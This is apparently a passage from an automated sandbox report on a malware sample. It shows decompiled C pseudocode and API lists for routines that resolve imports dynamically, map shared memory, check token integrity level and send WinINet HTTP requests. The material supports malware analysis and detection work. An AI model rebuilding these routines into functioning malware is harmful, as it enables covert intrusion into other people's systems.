                      					_t81 = _t133 & 0x0000ffff;
                      				}
                      				_v52 = _t81;
                      				_t82 =  *0x2bda1c0; // 0x0
                      				_t116 = 0;
                      				if(_t82 == 0) {
                      					L6:
                      					if(_t138 != 0) {
                      						L18:
                      						_t83 =  *0x2bda1c0; // 0x0
                      						_v48 = _t138;
                      						if(_t83 != 0) {
                      							_t116 =  *_t83(2,  &_v72);
                      						}
                      						if(_t116 != 0) {
                      							L32:
                      							 *_a8 = _t116;
                      							L33:
                      							_t85 =  *0x2bda1c0; // 0x0
                      							if(_t85 != 0) {
                      								_v40 = _v40 & 0x00000000;
                      								_v48 = _t138;
                      								_v44 = _t116;
                      								 *_t85(5,  &_v72);
                      							}
                      							return _t116;
                      						} else {
                      							if(_t139[5] == _t116 || _t139[7] == _t116) {
                      								L27:
                      								_t116 = GetProcAddress(_t138, _v52);
                      								if(_t116 == 0) {
                      									_v40 = GetLastError();
                      									_t90 =  *0x2bda1bc; // 0x0
                      									if(_t90 != 0) {
                      										_t116 =  *_t90(4,  &_v72);
                      									}
                      									if(_t116 == 0) {
                      										_a4 =  &_v72;
                      										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                      										_t116 = _v44;
                      									}
                      								}
                      								goto L32;
                      							} else {
                      								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                      								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                      									_t116 =  *(_a4 + _v16);
                      									if(_t116 != 0) {
                      										goto L32;
                      									}
                      								}
                      								goto L27;
                      							}
                      						}
                      					}
                      					_t98 =  *0x2bda1c0; // 0x0
                      					if(_t98 == 0) {
                      						L9:
                      						_t99 = LoadLibraryA(_v60); // executed
                      						_t138 = _t99;
                      						if(_t138 != 0) {
                      							L13:
                      							if(InterlockedExchange(_v28, _t138) == _t138) {
                      								FreeLibrary(_t138);
                      							} else {
                      								if(_t139[6] != 0) {
                      									_t102 = LocalAlloc(0x40, 8);
                      									if(_t102 != 0) {
                      										 *(_t102 + 4) = _t139;
                      										_t125 =  *0x2bda1b8; // 0x0
                      										 *_t102 = _t125;
                      										 *0x2bda1b8 = _t102;
                      									}
                      								}
                      							}
                      							goto L18;
                      						}
                      						_v40 = GetLastError();
                      						_t104 =  *0x2bda1bc; // 0x0
                      						if(_t104 == 0) {
                      							L12:
                      							_a8 =  &_v72;
                      							RaiseException(0xc06d007e, 0, 1,  &_a8);
                      							return _v44;
                      						}
                      						_t138 =  *_t104(3,  &_v72);
                      						if(_t138 != 0) {
                      							goto L13;
                      						}
                      						goto L12;
                      					}
                      					_t138 =  *_t98(1,  &_v72);
                      					if(_t138 != 0) {
                      						goto L13;
                      					}
                      					goto L9;
                      				}
                      				_t116 =  *_t82(0,  &_v72);
                      				if(_t116 != 0) {
                      					goto L33;
                      				}
                      				goto L6;
                      			}

                      APIs
                      • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02BD803E
                      • LoadLibraryA.KERNEL32(?), ref: 02BD80BB
                      • GetLastError.KERNEL32 ref: 02BD80C7
                      • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02BD80FA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
• Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad
                      • String ID: $$@MqtNqt
                      • API String ID: 948315288-516465142
                      • Opcode ID: ed5b378069e8804e8da5ea9b029240be88e19d8a843f73956a601f4f5266d6ef
                      • Instruction ID: 0b1b016626d66680b45b81000bb6bfd664ccf6bb07c3fcaa90eab7de0d617116
                      • Opcode Fuzzy Hash: ed5b378069e8804e8da5ea9b029240be88e19d8a843f73956a601f4f5266d6ef
                      • Instruction Fuzzy Hash: A6813971A01609AFDB14CF99D890BEEB7F5FB48741F148469E909E7240FB70E98ACB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 74%
                      			E02BD415A(intOrPtr __edx, void** _a4, void** _a8) {
                      				intOrPtr _v8;
                      				struct _FILETIME* _v12;
                      				short _v56;
                      				struct _FILETIME* _t12;
                      				intOrPtr _t13;
                      				void* _t17;
                      				void* _t21;
                      				intOrPtr _t27;
                      				long _t28;
                      				void* _t30;
                      
                      				_t27 = __edx;
                      				_t12 =  &_v12;
                      				GetSystemTimeAsFileTime(_t12);
                      				_push(0x192);
                      				_push(0x54d38000);
                      				_push(_v8);
                      				_push(_v12);
                      				L02BD82D4();
                      				_push(_t12);
                      				_v12 = _t12;
                      				_t13 =  *0x2bda348; // 0x9dd5a8
                      				_t5 = _t13 + 0x2bdb7b4; // 0x35b8d5c
                      				_t6 = _t13 + 0x2bdb644; // 0x530025
                      				_push(0x16);
                      				_push( &_v56);
                      				_v8 = _t27;
                      				L02BD7F3A();
                      				_t17 = CreateFileMappingW(0xffffffff, 0x2bda34c, 4, 0, 0x1000,  &_v56); // executed
                      				_t30 = _t17;
                      				if(_t30 == 0) {
                      					_t28 = GetLastError();
                      				} else {
                      					if(GetLastError() == 0xb7) {
                      						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                      						if(_t21 == 0) {
                      							_t28 = GetLastError();
                      							if(_t28 != 0) {
                      								goto L6;
                      							}
                      						} else {
                      							 *_a4 = _t30;
                      							 *_a8 = _t21;
                      							_t28 = 0;
                      						}
                      					} else {
                      						_t28 = 2;
                      						L6:
                      						CloseHandle(_t30);
                      					}
                      				}
                      				return _t28;
                      			}

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53,?,?), ref: 02BD4166
                      • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02BD417C
                      • _snwprintf.NTDLL ref: 02BD41A1
                      • CreateFileMappingW.KERNELBASE(000000FF,02BDA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 02BD41BD
                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53,?), ref: 02BD41CF
                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 02BD41E6
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53), ref: 02BD4207
                      • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,02BD25B1,?,?,4D283A53,?), ref: 02BD420F
                      Strings
                      Similarity
                      • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                      • String ID: @MqtNqt
                      • API String ID: 1814172918-2883916605
                      • Opcode ID: d84a997ceab386c5af0d2f24f8bc46b66386ba89fb57f138ad036a2b6d17aec1
                      • Instruction ID: 5e9a41f6d29d3cd70edf1ec83b4820ebe4604ca82fc8b5c09a2cad0bae39d26d
                      • Opcode Fuzzy Hash: d84a997ceab386c5af0d2f24f8bc46b66386ba89fb57f138ad036a2b6d17aec1
                      • Instruction Fuzzy Hash: D421D272A81604BBD721AF68DC05FDE7BBAEB84794F154060F509E71C0FB709905CB50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 93%
                      			E02BD4BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                      				void* _t17;
                      				void* _t18;
                      				void* _t19;
                      				void* _t20;
                      				void* _t21;
                      				intOrPtr _t24;
                      				void* _t37;
                      				void* _t41;
                      				intOrPtr* _t45;
                      
                      				_t41 = __edi;
                      				_t37 = __ebx;
                      				_t45 = __eax;
                      				_t16 =  *((intOrPtr*)(__eax + 0x20));
                      				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                      					E02BD16B2(_t16, __ecx, 0xea60);
                      				}
                      				_t17 =  *(_t45 + 0x18);
                      				_push(_t37);
                      				_push(_t41);
                      				if(_t17 != 0) {
                      					InternetSetStatusCallback(_t17, 0);
                      					InternetCloseHandle( *(_t45 + 0x18)); // executed
                      				}
                      				_t18 =  *(_t45 + 0x14);
                      				if(_t18 != 0) {
                      					InternetSetStatusCallback(_t18, 0);
                      					InternetCloseHandle( *(_t45 + 0x14));
                      				}
                      				_t19 =  *(_t45 + 0x10);
                      				if(_t19 != 0) {
                      					InternetSetStatusCallback(_t19, 0);
                      					InternetCloseHandle( *(_t45 + 0x10));
                      				}
                      				_t20 =  *(_t45 + 0x1c);
                      				if(_t20 != 0) {
                      					FindCloseChangeNotification(_t20); // executed
                      				}
                      				_t21 =  *(_t45 + 0x20);
                      				if(_t21 != 0) {
                      					CloseHandle(_t21);
                      				}
                      				_t22 =  *((intOrPtr*)(_t45 + 8));
                      				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                      					E02BD61DA(_t22);
                      					 *((intOrPtr*)(_t45 + 8)) = 0;
                      					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                      				}
                      				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                      				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                      					E02BD61DA(_t23);
                      				}
                      				_t24 =  *_t45;
                      				if(_t24 != 0) {
                      					_t24 = E02BD61DA(_t24);
                      				}
                      				_t46 =  *((intOrPtr*)(_t45 + 4));
                      				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                      					return E02BD61DA(_t46);
                      				}
                      				return _t24;
                      			}

                      APIs
                      • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD4C15
                      • InternetCloseHandle.WININET(?), ref: 02BD4C1A
                      • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD4C25
                      • InternetCloseHandle.WININET(?), ref: 02BD4C2A
                      • InternetSetStatusCallback.WININET(?,00000000), ref: 02BD4C35
                      • InternetCloseHandle.WININET(?), ref: 02BD4C3A
                      • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,02BD2248,?,?,747581D0,00000000,00000000), ref: 02BD4C4A
                      • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02BD2248,?,?,747581D0,00000000,00000000), ref: 02BD4C54
                        • Part of subcall function 02BD16B2: WaitForMultipleObjects.KERNEL32(00000002,02BD7C47,00000000,02BD7C47,?,?,?,02BD7C47,0000EA60), ref: 02BD16CD
                      Similarity
                      • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                      • String ID:
                      • API String ID: 2172891992-0
                      • Opcode ID: 1979fdad9db60fcdae1427e1620ffce1db3e06547f854a1a117596c27b94cf69
                      • Instruction ID: e5f58242e3cc8ce3cdd4489c2ab3f0f8a88869a6e76b614a231a6d15dae9ce10
                      • Opcode Fuzzy Hash: 1979fdad9db60fcdae1427e1620ffce1db3e06547f854a1a117596c27b94cf69
                      • Instruction Fuzzy Hash: 2E112E76A006586BC630AFAAED84C9BB7FEFF452083594D58E089D3511E734F8898E60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E02BD5E40(long* _a4) {
                      				long _v8;
                      				void* _v12;
                      				void _v16;
                      				long _v20;
                      				int _t33;
                      				void* _t46;
                      
                      				_v16 = 1;
                      				_v20 = 0x2000;
                      				if( *0x2bda2fc > 5) {
                      					_v16 = 0;
                      					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                      						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                      						_v8 = 0;
                      						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                      						if(_v8 != 0) {
                      							_t46 = E02BD33DC(_v8);
                      							if(_t46 != 0) {
                      								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                      								if(_t33 != 0) {
                      									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                      								}
                      								E02BD61DA(_t46);
                      							}
                      						}
                      						CloseHandle(_v12);
                      					}
                      				}
                      				 *_a4 = _v20;
                      				return _v16;
                      			}

                      APIs
                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02BD5E72
                      • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02BD5E92
                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02BD5EA2
                      • CloseHandle.KERNEL32(00000000), ref: 02BD5EF2
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02BD5EC5
                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02BD5ECD
                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02BD5EDD
                      Similarity
                      • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                      • String ID:
                      • API String ID: 1295030180-0
                      • Opcode ID: cb08f32ad7f486109e71db323ce44b36c80c4306d266bd33c8ffef6d99245ec9
                      • Instruction ID: bb2af44bb39a428b8bd18b82a3bf507812133f7a756b75bee504989201f155b0
                      • Opcode Fuzzy Hash: cb08f32ad7f486109e71db323ce44b36c80c4306d266bd33c8ffef6d99245ec9
                      • Instruction Fuzzy Hash: 10214875D00209BFEB10EFA4DC84EEEBBB9EB48344F4000A5E910A7191EB718A54DF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 64%
                      			E02BD6675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                      				intOrPtr _v8;
                      				intOrPtr _t9;
                      				intOrPtr _t13;
                      				char* _t19;
                      				char* _t28;
                      				void* _t33;
                      				void* _t34;
                      				char* _t36;
                      				void* _t38;
                      				intOrPtr* _t39;
                      				char* _t40;
                      				char* _t42;
                      				char* _t43;
                      
                      				_t34 = __edx;
                      				_push(__ecx);
                      				_t9 =  *0x2bda348; // 0x9dd5a8
                      				_t1 = _t9 + 0x2bdb516; // 0x253d7325
                      				_t36 = 0;
                      				_t28 = E02BD5815(__ecx, _t1);
                      				if(_t28 != 0) {
                      					_t39 = __imp__;
                      					_t13 =  *_t39(_t28, _t38);
                      					_v8 = _t13;
                      					_t6 =  *_t39(_a4) + 1; // 0x35b9601
                      					_t40 = E02BD33DC(_v8 + _t6);
                      					if(_t40 != 0) {
                      						strcpy(_t40, _t28);
                      						_pop(_t33);
                      						__imp__(_t40, _a4);
                      						_t19 = E02BD5063(_t33, _t34, _t40, _a8); // executed
                      						_t36 = _t19;
                      						E02BD61DA(_t40);
                      						_t42 = E02BD4AC7(StrTrimA(_t36, "="), _t36);
                      						if(_t42 != 0) {
                      							E02BD61DA(_t36);
                      							_t36 = _t42;
                      						}
                      						_t43 = E02BD2708(_t36, _t33);
                      						if(_t43 != 0) {
                      							E02BD61DA(_t36);
                      							_t36 = _t43;
                      						}
                      					}
                      					E02BD61DA(_t28);
                      				}
                      				return _t36;
                      			}

                      APIs
                        • Part of subcall function 02BD5815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD668E,253D7325,00000000,00000000,?,775EC740,02BD3ECE), ref: 02BD587C
                        • Part of subcall function 02BD5815: sprintf.NTDLL ref: 02BD589D
                      • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A0
                      • lstrlen.KERNEL32(00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A8
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • strcpy.NTDLL ref: 02BD66BF
                      • lstrcat.KERNEL32(00000000,00000000), ref: 02BD66CA
                        • Part of subcall function 02BD5063: lstrlen.KERNEL32(00000000,00000000,02BD3ECE,00000000,?,02BD66D9,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD5074
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66E7
                        • Part of subcall function 02BD4AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,02BD66F3,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD4AD1
                        • Part of subcall function 02BD4AC7: _snprintf.NTDLL ref: 02BD4B2F
                      Strings
                      Similarity
                      • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                      • String ID: =
                      • API String ID: 2864389247-1428090586
                      • Opcode ID: 7f071512f0f719438a62fc5de63cf8870cd38549608036725d0502d897243c1a
                      • Instruction ID: e6b95b7ac81611b7d13be6f8ced7b59c1d0de25cd9ef029919476b0d4e60fa5b
                      • Opcode Fuzzy Hash: 7f071512f0f719438a62fc5de63cf8870cd38549608036725d0502d897243c1a
                      • Instruction Fuzzy Hash: DE115136D01529674722BB68AC94CEE37AE9F457A83054095F904E7101FE74DD065FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 350 401202-401214 call 4012e6 353 4012d5 350->353 354 40121a-40124f GetModuleHandleA GetProcAddress 350->354 355 4012dc-4012e3 353->355 356 401251-401265 GetProcAddress 354->356 357 4012cd-4012d3 call 401ba9 354->357 356->357 359 401267-40127b GetProcAddress 356->359 357->355 359->357 361 40127d-401291 GetProcAddress 359->361 361->357 362 401293-4012a7 GetProcAddress 361->362 362->357 363 4012a9-4012ba call 40110b 362->363 365 4012bf-4012c4 363->365 365->357 366 4012c6-4012cb 365->366 366->355
                      C-Code - Quality: 100%
                      			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                      				intOrPtr _v8;
                      				_Unknown_base(*)()* _t29;
                      				_Unknown_base(*)()* _t33;
                      				_Unknown_base(*)()* _t36;
                      				_Unknown_base(*)()* _t39;
                      				_Unknown_base(*)()* _t42;
                      				intOrPtr _t46;
                      				struct HINSTANCE__* _t50;
                      				intOrPtr _t56;
                      
                      				_t56 = E004012E6(0x20);
                      				if(_t56 == 0) {
                      					_v8 = 8;
                      				} else {
                      					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                      					_v8 = 0x7f;
                      					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                      					 *(_t56 + 0xc) = _t29;
                      					if(_t29 == 0) {
                      						L8:
                      						E00401BA9(_t56);
                      					} else {
                      						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                      						 *(_t56 + 0x10) = _t33;
                      						if(_t33 == 0) {
                      							goto L8;
                      						} else {
                      							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                      							 *(_t56 + 0x14) = _t36;
                      							if(_t36 == 0) {
                      								goto L8;
                      							} else {
                      								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                      								 *(_t56 + 0x18) = _t39;
                      								if(_t39 == 0) {
                      									goto L8;
                      								} else {
                      									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                      									 *(_t56 + 0x1c) = _t42;
                      									if(_t42 == 0) {
                      										goto L8;
                      									} else {
                      										 *((intOrPtr*)(_t56 + 8)) = _a8;
                      										 *((intOrPtr*)(_t56 + 4)) = _a4;
                      										_t46 = E0040110B(_t56, _a12); // executed
                      										_v8 = _t46;
                      										if(_t46 != 0) {
                      											goto L8;
                      										} else {
                      											 *_a16 = _t56;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _v8;
                      			}

                      APIs
                        • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                      • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                      • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                        • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168
                        • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                      • String ID:
                      • API String ID: 3012371009-0
                      • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                      • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                      • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                      • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 367 2bd51d8-2bd51e7 368 2bd51e9-2bd51f9 call 2bd2058 367->368 369 2bd51fb-2bd51ff call 2bd7b83 367->369 368->369 374 2bd524a GetLastError 368->374 373 2bd5204-2bd5206 369->373 375 2bd5208-2bd522d ResetEvent * 2 HttpSendRequestA 373->375 376 2bd5245-2bd5248 373->376 379 2bd524c-2bd524e 374->379 377 2bd522f-2bd5236 GetLastError 375->377 378 2bd523a-2bd523d SetEvent 375->378 376->374 376->379 377->376 380 2bd5238 377->380 381 2bd5243 378->381 380->381 381->376
                      C-Code - Quality: 100%
                      			E02BD51D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                      				void* __esi;
                      				long _t10;
                      				void* _t18;
                      				void* _t22;
                      
                      				_t9 = __eax;
                      				_t22 = __eax;
                      				if(_a4 != 0 && E02BD2058(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                      					L9:
                      					return GetLastError();
                      				}
                      				_t10 = E02BD7B83(_t9, _t18, _t22, _a8); // executed
                      				if(_t10 == 0) {
                      					ResetEvent( *(_t22 + 0x1c));
                      					ResetEvent( *(_t22 + 0x20));
                      					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                      						SetEvent( *(_t22 + 0x1c));
                      						goto L7;
                      					} else {
                      						_t10 = GetLastError();
                      						if(_t10 == 0x3e5) {
                      							L7:
                      							_t10 = 0;
                      						}
                      					}
                      				}
                      				if(_t10 == 0xffffffff) {
                      					goto L9;
                      				}
                      				return _t10;
                      			}

                      APIs
                      • ResetEvent.KERNEL32(?,00000008,?,?,00000102,02BD21E7,?,?,747581D0,00000000), ref: 02BD5212
                      • ResetEvent.KERNEL32(?), ref: 02BD5217
                      • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 02BD5224
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?,?), ref: 02BD522F
                      • GetLastError.KERNEL32(?,?,00000102,02BD21E7,?,?,747581D0,00000000), ref: 02BD524A
                        • Part of subcall function 02BD2058: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?,?,747581D0), ref: 02BD2064
                        • Part of subcall function 02BD2058: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BD51F7,?,?,?,?,00000102,02BD21E7,?), ref: 02BD20C2
                        • Part of subcall function 02BD2058: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD20D2
                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02BD3F34,00000000,?), ref: 02BD523D
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                      • String ID:
                      • API String ID: 3739416942-0
                      • Opcode ID: a5a58009fae3a44d71a502ae43173bce06b03bbaa9ba6dcd25a8539619cd79e8
                      • Instruction ID: d7a76eb94bf21ac04e45ec984e5175a2a00a41195871c86c813415edf2409f62
                      • Opcode Fuzzy Hash: a5a58009fae3a44d71a502ae43173bce06b03bbaa9ba6dcd25a8539619cd79e8
                      • Instruction Fuzzy Hash: A0016D31101602ABD7306B61EC44FDBBBA9FF593A4F900A65F591D20E0F720E858DB20
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E02BD2523(signed int __edx) {
                      				signed int _v8;
                      				long _v12;
                      				CHAR* _v16;
                      				long _v20;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t21;
                      				CHAR* _t22;
                      				CHAR* _t25;
                      				intOrPtr _t26;
                      				void* _t27;
                      				void* _t31;
                      				intOrPtr _t32;
                      				void* _t33;
                      				CHAR* _t37;
                      				CHAR* _t44;
                      				CHAR* _t45;
                      				void* _t50;
                      				void* _t52;
                      				signed char _t57;
                      				intOrPtr _t59;
                      				signed int _t60;
                      				void* _t64;
                      				CHAR* _t68;
                      				CHAR* _t69;
                      				char* _t70;
                      				void* _t71;
                      
                      				_t62 = __edx;
                      				_v20 = 0;
                      				_v8 = 0;
                      				_v12 = 0;
                      				_t21 = E02BD4520();
                      				if(_t21 != 0) {
                      					_t60 =  *0x2bda2fc; // 0x2000000a
                      					_t56 = (_t60 & 0xf0000000) + _t21;
                      					 *0x2bda2fc = (_t60 & 0xf0000000) + _t21;
                      				}
                      				_t22 =  *0x2bda178(0, 2);
                      				_v16 = _t22;
                      				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                      					_t25 = E02BD3037( &_v8,  &_v20); // executed
                      					_t55 = _t25;
                      					_t26 =  *0x2bda348; // 0x9dd5a8
                      					if( *0x2bda2fc > 5) {
                      						_t8 = _t26 + 0x2bdb51d; // 0x4d283a53
                      						_t27 = _t8;
                      					} else {
                      						_t7 = _t26 + 0x2bdb9db; // 0x44283a44
                      						_t27 = _t7;
                      					}
                      					E02BD4332(_t27, _t27);
                      					_t31 = E02BD415A(_t62,  &_v20,  &_v12); // executed
                      					if(_t31 == 0) {
                      						CloseHandle(_v20);
                      					}
                      					_t64 = 5;
                      					if(_t55 != _t64) {
                      						_t32 = E02BD27A0();
                      						 *0x2bda310 =  *0x2bda310 ^ 0x81bbe65d;
                      						 *0x2bda36c = _t32;
                      						_t33 = E02BD33DC(0x60);
                      						 *0x2bda3cc = _t33;
                      						__eflags = _t33;
                      						if(_t33 == 0) {
                      							_push(8);
                      							_pop(0);
                      						} else {
                      							memset(_t33, 0, 0x60);
                      							_t50 =  *0x2bda3cc; // 0x35b9600
                      							_t71 = _t71 + 0xc;
                      							__imp__(_t50 + 0x40);
                      							_t52 =  *0x2bda3cc; // 0x35b9600
                      							 *_t52 = 0x2bdb142;
                      						}
                      						_t55 = 0;
                      						__eflags = 0;
                      						if(0 == 0) {
                      							_t37 = RtlAllocateHeap( *0x2bda2d8, 0, 0x43);
                      							 *0x2bda368 = _t37;
                      							__eflags = _t37;
                      							if(_t37 == 0) {
                      								_push(8);
                      								_pop(0);
                      							} else {
                      								_t57 =  *0x2bda2fc; // 0x2000000a
                      								_t62 = _t57 & 0x000000ff;
                      								_t59 =  *0x2bda348; // 0x9dd5a8
                      								_t13 = _t59 + 0x2bdb74a; // 0x697a6f4d
                      								_t56 = _t13;
                      								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x2bd927b);
                      							}
                      							_t55 = 0;
                      							__eflags = 0;
                      							if(0 == 0) {
                      								asm("sbb eax, eax");
                      								E02BD3BD3( ~_v8 &  *0x2bda310, 0x2bda00c); // executed
